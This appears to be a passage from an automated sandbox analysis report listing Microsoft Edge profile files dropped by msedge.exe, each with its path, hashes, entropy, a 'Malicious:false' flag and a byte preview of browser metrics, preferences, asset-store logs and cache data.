                                                                                                                                                                  Preview:...@..@...@.....C.].....@................`...O..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30....q.........117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".rwlbnn20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@............./......................w..U].0r........>.........."....."...2...".*.:............B)..1.3.147.37.. .*.RegKeyNotFound2.windowsR...Z.....K7..E@..$...SF@.......Y@.......Y@.......Y@........?........?.................?.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@................Y@.......Y@.......Y@........?........?z...........................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CrashpadMetrics-active.pma

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                  Entropy (8bit):0.3553968406659012
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:12:biUXhV0xosU8xCe+JKlkQuMRxCb8ZXfgYJ0IJpP0KLsyW1L7Fx6:bFRqxosU8xWMk8xVZ4YWI30otWn
                                                                                                                                                                  MD5:CFAB81B800EDABACBF6CB61AA78D5258
                                                                                                                                                                  SHA1:2730D4DA1BE7238D701DC84EB708A064B8D1CF27
                                                                                                                                                                  SHA-256:452A5479B9A2E03612576C30D30E6F51F51274CD30EF576EA1E71D20C657376F
                                                                                                                                                                  SHA-512:EC188B0EE4D3DAABC26799B34EE471BEE988BDD7CEB011ED7DF3D4CF26F98932BBBB4B70DC2B7FD4DF9A3981B3CE22F4B5BE4A0DB97514D526E521575EFB2EC6
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...@.@...@..............@...................................`... ...i.y.........CrashpadMetrics.....i.y..Yd.h.......A.......e............,.........W.......................W....................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.UsedPct.......h...i.y.[".................................!...&...+...0...6...;...@...E...K...P...U...Z...`...e...........i.y..Yd.........A............................E.[4.f..................E.[4.f.................Microsoft.UMA.PersistentAllocator.CrashpadMetrics.Errors............i.y..Yd.........A..................._..-`....h-.....................h-....................Crashpad.HandlerLifetimeMilestone.......0...i.y.[".........................................i.y..Yd.@.......C...........................VM....],................WM....],................Stability.BrowserExitCodes...... ...i.y......VM....],........H...i.y.1U!S............................................................ ...i.y...0...WM....],........................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                  Entropy (8bit):3.060980776278344
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:FiWWltl/9UgBVP/Sh/JzvLi2RRIxINXj1J1:o1//BVsJDG2Yq
                                                                                                                                                                  MD5:74B32A83C9311607EB525C6E23854EE0
                                                                                                                                                                  SHA1:C345A4A3BB52D7CD94EA63B75A424BE7B52CFCD2
                                                                                                                                                                  SHA-256:06509A7E418D9CCE502E897EAEEE8C6E3DCB1D0622B421DD968AF3916A5BFF90
                                                                                                                                                                  SHA-512:ADC193A89F0E476E7326B4EA0472814FE6DD0C16FC010AAF7B4CF78567D5DF6A1574C1CE99A63018AFE7E9AD68918147880621A3C00FAA7AD1014A0056B4B9C4
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:sdPC......................5.y&.K.?....................................................................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................48ea0ba2-e9bb-4568-92cb-0f42a5c5d505............

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\0f5f1fd3-f2ff-4509-93b1-b60ea8611564.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):34462
                                                                                                                                                                  Entropy (8bit):5.558788214244173
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:fgkBlZWPOkfUl8F1+UoAYDCx9Tuqh0VfUC9xbog/OVxCVw3rwyTTDdKpvtu6:fgkBlZWPOkfUlu1jagEwkyTt6t1
                                                                                                                                                                  MD5:C5ACC78339F79F1814A1509DCF475755
                                                                                                                                                                  SHA1:157B6BAEBDA80954E7146017456139E44AA94664
                                                                                                                                                                  SHA-256:61FD1E345F09C2E2A90C65A59F8C65C84A665CC6DCEE069F81AE3B198A6B23E5
                                                                                                                                                                  SHA-512:08027B14E071D2A3CC4A7E9756C135D407C76AC78A076B1F19437889DAB29AFE1E2085C58D1138DAABCA6976A2AD2DA9C0AD5B2DE1BA5790AD22CEAE1966DEE1
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13380675474265892","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13380675474265892","location":5,"ma

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\1647e7b4-e09d-42f4-bd4f-58db307e0a61.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17577), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):17578
                                                                                                                                                                  Entropy (8bit):5.418576984252411
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6jY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVby+1f:sVsLAJu4YJVelLTtA6pUqQwdP
                                                                                                                                                                  MD5:8085F24123BE4E0064145EAA09312CA1
                                                                                                                                                                  SHA1:832ED2296DDCBD8B20F1F99B47860CF1B8BF82D5
                                                                                                                                                                  SHA-256:6BED7BAA62F1837CC1BF65A5EDA93446B6F77A525AD289AC740DEA98CCB4034F
                                                                                                                                                                  SHA-512:A0EC7E678604C814009804C1D75767922AD5C9E8905EBA4482247481D55B65106D7CC3D037854E2F32C454F7A179394DB6E4270EE44D7630D515ED27458F40FB
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\25417193-209d-4376-88ae-b9c6089f1d1c.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (18304), with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):18305
                                                                                                                                                                  Entropy (8bit):5.458121331942733
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZiuaba4uypYJVelS6rDyLiY6YIYGYeLPFrkcQbxT8fpj+Fl0QwVZAP:sVsLAJu4YJVel3DJTtA6pUqQwbAP
                                                                                                                                                                  MD5:2EBBB08DB23C6FED04DBA7BD2491BEA8
                                                                                                                                                                  SHA1:E36A70B41EC00E6098CB5DA85312D1AB340B8BB4
                                                                                                                                                                  SHA-256:6B66E9D58FDA97592CFA63A78BF92F52A939CD720D3EDD62F18D6419F7BCD872
                                                                                                                                                                  SHA-512:8AE26416E0551B4DA06359AB67E1152AA76A49E72ECBC673E1D6845835D4BC491BA6B72A7CFD490F918905E259BEB458EC4651B300499A87914327D0700BED13
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\422c05ff-2330-4db9-b6f0-b698a994e57d.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\489a05df-82a7-46b7-a4de-a5d2ce851acc.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12228
                                                                                                                                                                  Entropy (8bit):5.0669605446084525
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:sVsJ9pQTryZigaba4uypYJVelaYM0d8fpj+Fl0QAby+df:sVsLA3u4YJVelqpUqQK3
                                                                                                                                                                  MD5:54A1373EB2076976B659C8023D97DD71
                                                                                                                                                                  SHA1:A7419FA658158C043F4584712671B3419DF5F648
                                                                                                                                                                  SHA-256:6FF1660046C3EE82A7DBC5227F68734DC96387D12BFBD2FAD517CB476359DFF5
                                                                                                                                                                  SHA-512:1B0C05C9171429BE69BDF948B283554587E42FA0BE5810200DF820DFA7E91656C4FF61A40DA8AD8D0C298CA2C4FA2FC8097FFEBAEDB3E482CAB7ED5F0A410B91
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380675474983220","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\9558f725-062b-4c1f-aa79-a60d180470ed.tmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000001.dbtmp

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:modified
                                                                                                                                                                  Size (bytes):1695826
                                                                                                                                                                  Entropy (8bit):5.041147618414944
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24576:nPfQUg6kAdRhiGzmYoAo2ENU0ifYeV3br2M:nPfZ/mS5
                                                                                                                                                                  MD5:A43225C579B1A85221E2F0A08D28066D
                                                                                                                                                                  SHA1:289FD534567EF7BB4A939B8F8768005EC3FF685C
                                                                                                                                                                  SHA-256:A0CC38334B0233FFF66E38946ED950949E7DB4E3C0E86D7C65965579A1D7EA3B
                                                                                                                                                                  SHA-512:BDDF05D8B61D4324F6627B4F2C9D6FD59EBCF15B4D1D6C2E616B2455AFD3A9E1793D83D92DC1CCAAB32FF5920052CBAB7228DE824F4128F098A2FB88B2EE603E
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:...m.................DB_VERSION.1.....................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13380675481154129.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"2DPW9BV28WrPpgGHdKsEvldNQvD7dA0AAxPa3B/lKN0=","size":11989}].r...................QUERY_TIMESTAMP:edge_hub_apps_manifest_gz4.7.*.13380675481166271.$QUERY:edge_hub_apps_manifest_gz4.7.*..[{"name":"edge_hub_apps_manifest_gz","url":"https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline","version":{"major":4,"minor":7,"patch":107},"hash":"Qoxdh2pZS19o99emYo77uFsfzxtXVDB75kV6eln53YE=","size":1682291}]=_.../..............'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.]{.. "configVersion": 32,.. "PrivilegedExperiences": [.. "ShorelinePrivileged

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\CURRENT (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):293
                                                                                                                                                                  Entropy (8bit):5.089389700065497
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:iO/fFo0q1wkn23oH+Tcwt9Eh1ZB2KLl94ZN4q2Pwkn23oH+Tcwt9Eh1tIFUv:7/P1fYeb9Eh1ZFLz4z4vYfYeb9Eh16F2
                                                                                                                                                                  MD5:D959964D6E8638DDE2AD33C5338CA051
                                                                                                                                                                  SHA1:58C06A2C7713EADEA0CB666A1BCD5AB064F349D9
                                                                                                                                                                  SHA-256:E6985262965F46AEF6013FD73F1917CF35CB683C839579AC88EDD3EBD75F9C3A
                                                                                                                                                                  SHA-512:F7D314E3E76E274AA3450F06F3825F1A449A5493DE04BA61723FE3E4E33DF5A5B215FE9F20E1B8705532CC0ACA3662BED88BFF24AE8C52C8742F10C77C3A8B23
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:2025/01/06-17:18:00.330 1660 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db since it was missing..2025/01/06-17:18:00.486 1660 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\MANIFEST-000001

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AssistanceHome\AssistanceHomeSQLite

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):12288
                                                                                                                                                                  Entropy (8bit):0.3202460253800455
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:6:l9bNFlEuWk8TRH9MRumWEyE4gLueXdNOmWxFxCxmWxYgCxmW5y/mWz4ynLAtD/W4:TLiuWkMORuHEyESeXdwDQ3SOAtD/ie
                                                                                                                                                                  MD5:40B18EC43DB334E7B3F6295C7626F28D
                                                                                                                                                                  SHA1:0E46584B0E0A9703C6B2EC1D246F41E63AF2296F
                                                                                                                                                                  SHA-256:85E961767239E90A361FB6AA0A3FD9DAA57CAAF9E30599BB70124F1954B751C8
                                                                                                                                                                  SHA-512:8BDACDC4A9559E4273AD01407D5D411035EECD927385A51172F401558444AD29B5AD2DC5562D1101244665EBE86BBDDE072E75ECA050B051482005EB6A52CDBD
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):28672
                                                                                                                                                                  Entropy (8bit):0.46265176391955903
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBudLm:TouQq3qh7z3bY2LNW9WMcUvBudS
                                                                                                                                                                  MD5:96A3592C4DC85AD3C2BA1478D93D1829
                                                                                                                                                                  SHA1:47028859E89C2103D6A25539CB921AC181543378
                                                                                                                                                                  SHA-256:EE5ADD93813E9110CD451127577DA7C7745BFADF9156D99A8081E92EB51004ED
                                                                                                                                                                  SHA-512:57C753DD3435665ECFF4B2CC85B32B2A5C32FEDCB4ED233519DA1637E804F27589A95A1EA837F6D4A78BC88ED07FB5DED350FC029C93B965A703C47C0DB81C08
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_0

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:FoxPro FPT, blocks size 512, next free block index 3284796609, field type 0
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.01057775872642915
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsFl:/F
                                                                                                                                                                  MD5:CF89D16BB9107C631DAABF0C0EE58EFB
                                                                                                                                                                  SHA1:3AE5D3A7CF1F94A56E42F9A58D90A0B9616AE74B
                                                                                                                                                                  SHA-256:D6A5FE39CD672781B256E0E3102F7022635F1D4BB7CFCC90A80FFFE4D0F3877E
                                                                                                                                                                  SHA-512:8CB5B059C8105EB91E74A7D5952437AAA1ADA89763C5843E7B0F1B93D9EBE15ED40F287C652229291FAC02D712CF7FF5ECECEF276BA0D7DDC35558A3EC3F77B0
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:............$...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_1

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):270336
                                                                                                                                                                  Entropy (8bit):8.280239615765425E-4
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsEllllkEthXllkl2:/M/xT02
                                                                                                                                                                  MD5:D0D388F3865D0523E451D6BA0BE34CC4
                                                                                                                                                                  SHA1:8571C6A52AACC2747C048E3419E5657B74612995
                                                                                                                                                                  SHA-256:902F30C1FB0597D0734BC34B979EC5D131F8F39A4B71B338083821216EC8D61B
                                                                                                                                                                  SHA-512:376011D00DE659EB6082A74E862CFAC97A9BB508E0B740761505142E2D24EC1C30AA61EFBC1C0DD08FF0F34734444DE7F77DD90A6CA42B48A4C7FAD5F0BDDD17
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_2

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.011852361981932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsHlDll:/H
                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DawnCache\data_3

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  File Type:data
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
